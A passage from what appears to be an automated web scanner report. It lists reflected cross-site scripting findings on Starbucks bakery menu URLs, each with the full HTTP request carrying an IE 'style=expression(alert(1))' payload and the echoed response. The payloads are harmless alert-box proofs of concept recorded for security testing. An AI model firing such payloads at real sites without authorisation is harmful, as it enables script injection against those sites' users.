Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:23 GMT
Connection: close
Content-Length: 43965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/multigrain-bagel?34ba5"style="x:expression(alert(1))"9c913b552b8=1"/>
...[SNIP]...

2.236. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/old-fashion-glazed-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67354"style%3d"x%3aexpression(alert(1))"1005e24d9c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67354"style="x:expression(alert(1))"1005e24d9c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/old-fashion-glazed-doughnut?67354"style%3d"x%3aexpression(alert(1))"1005e24d9c0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:27 GMT
Connection: close
Content-Length: 43941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut?67354"style="x:expression(alert(1))"1005e24d9c0=1"/>
...[SNIP]...

2.237. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/outrageous-oatmeal-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe3f"style%3d"x%3aexpression(alert(1))"3b24c4e3b50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffe3f"style="x:expression(alert(1))"3b24c4e3b50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/outrageous-oatmeal-cookie?ffe3f"style%3d"x%3aexpression(alert(1))"3b24c4e3b50=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:10 GMT
Connection: close
Content-Length: 43745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie?ffe3f"style="x:expression(alert(1))"3b24c4e3b50=1"/>
...[SNIP]...

2.238. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/petite-vanilla-bean-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8dda"style%3d"x%3aexpression(alert(1))"f64420d0491 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8dda"style="x:expression(alert(1))"f64420d0491 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/petite-vanilla-bean-scone?f8dda"style%3d"x%3aexpression(alert(1))"f64420d0491=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:27 GMT
Connection: close
Content-Length: 44106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone?f8dda"style="x:expression(alert(1))"f64420d0491=1"/>
...[SNIP]...

2.239. http://www.starbucks.com/menu/food/bakery/plain-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/plain-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa675"style%3d"x%3aexpression(alert(1))"b649a3a4e01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa675"style="x:expression(alert(1))"b649a3a4e01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/plain-bagel?aa675"style%3d"x%3aexpression(alert(1))"b649a3a4e01=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:19 GMT
Connection: close
Content-Length: 43603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/plain-bagel?aa675"style="x:expression(alert(1))"b649a3a4e01=1"/>
...[SNIP]...

2.240. http://www.starbucks.com/menu/food/bakery/pumpkin-bread [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/pumpkin-bread

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96de"style%3d"x%3aexpression(alert(1))"ee177beb35c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d96de"style="x:expression(alert(1))"ee177beb35c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/pumpkin-bread?d96de"style%3d"x%3aexpression(alert(1))"ee177beb35c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:33 GMT
Connection: close
Content-Length: 43511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/pumpkin-bread?d96de"style="x:expression(alert(1))"ee177beb35c=1"/>
...[SNIP]...

2.241. http://www.starbucks.com/menu/food/bakery/raspberry-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/raspberry-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59168"style%3d"x%3aexpression(alert(1))"e787100da19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59168"style="x:expression(alert(1))"e787100da19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/raspberry-scone?59168"style%3d"x%3aexpression(alert(1))"e787100da19=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:59:18 GMT
Connection: close
Content-Length: 43778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/raspberry-scone?59168"style="x:expression(alert(1))"e787100da19=1"/>
...[SNIP]...

2.242. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/red-velvet-cupcake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abbb"style%3d"x%3aexpression(alert(1))"62d0d1600ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6abbb"style="x:expression(alert(1))"62d0d1600ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/red-velvet-cupcake?6abbb"style%3d"x%3aexpression(alert(1))"62d0d1600ca=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:10 GMT
Connection: close
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake?6abbb"style="x:expression(alert(1))"62d0d1600ca=1"/>
...[SNIP]...

2.243. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa4bb"style%3d"x%3aexpression(alert(1))"fdc2532897b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa4bb"style="x:expression(alert(1))"fdc2532897b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake?fa4bb"style%3d"x%3aexpression(alert(1))"fdc2532897b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:53 GMT
Connection: close
Content-Length: 44696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake?fa4bb"style="x:expression(alert(1))"fdc2532897b=1"/>
...[SNIP]...

2.244. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0103"style%3d"x%3aexpression(alert(1))"e7f8b0994af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0103"style="x:expression(alert(1))"e7f8b0994af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake?f0103"style%3d"x%3aexpression(alert(1))"e7f8b0994af=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:59 GMT
Connection: close
Content-Length: 44736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake?f0103"style="x:expression(alert(1))"e7f8b0994af=1"/>
...[SNIP]...

2.245. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-very-berry-coffeecake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e31eb"style%3d"x%3aexpression(alert(1))"b5a7dd3f58b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e31eb"style="x:expression(alert(1))"b5a7dd3f58b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/reduced-fat-very-berry-coffeecake?e31eb"style%3d"x%3aexpression(alert(1))"b5a7dd3f58b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:11 GMT
Connection: close
Content-Length: 44686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake?e31eb"style="x:expression(alert(1))"b5a7dd3f58b=1"/>
...[SNIP]...

2.246. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/starbucks-classic-coffee-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c557"style%3d"x%3aexpression(alert(1))"640124d6dd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c557"style="x:expression(alert(1))"640124d6dd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/starbucks-classic-coffee-cake?7c557"style%3d"x%3aexpression(alert(1))"640124d6dd5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:59:20 GMT
Connection: close
Content-Length: 44398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake?7c557"style="x:expression(alert(1))"640124d6dd5=1"/>
...[SNIP]...

2.247. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-double-chocolate-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9f82"style%3d"x%3aexpression(alert(1))"12a2cb3519d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9f82"style="x:expression(alert(1))"12a2cb3519d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/treat-sized-double-chocolate-cookie?e9f82"style%3d"x%3aexpression(alert(1))"12a2cb3519d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:01 GMT
Connection: close
Content-Length: 43344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie?e9f82"style="x:expression(alert(1))"12a2cb3519d=1"/>
...[SNIP]...

2.248. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-peanut-butter-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e303f"style%3d"x%3aexpression(alert(1))"5921d239029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e303f"style="x:expression(alert(1))"5921d239029 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/treat-sized-peanut-butter-cookie?e303f"style%3d"x%3aexpression(alert(1))"5921d239029=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:36 GMT
Connection: close
Content-Length: 43323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie?e303f"style="x:expression(alert(1))"5921d239029=1"/>
...[SNIP]...

2.249. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/vanilla-bean-cupcake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177c2"style%3d"x%3aexpression(alert(1))"a4806e71177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 177c2"style="x:expression(alert(1))"a4806e71177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/vanilla-bean-cupcake?177c2"style%3d"x%3aexpression(alert(1))"a4806e71177=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
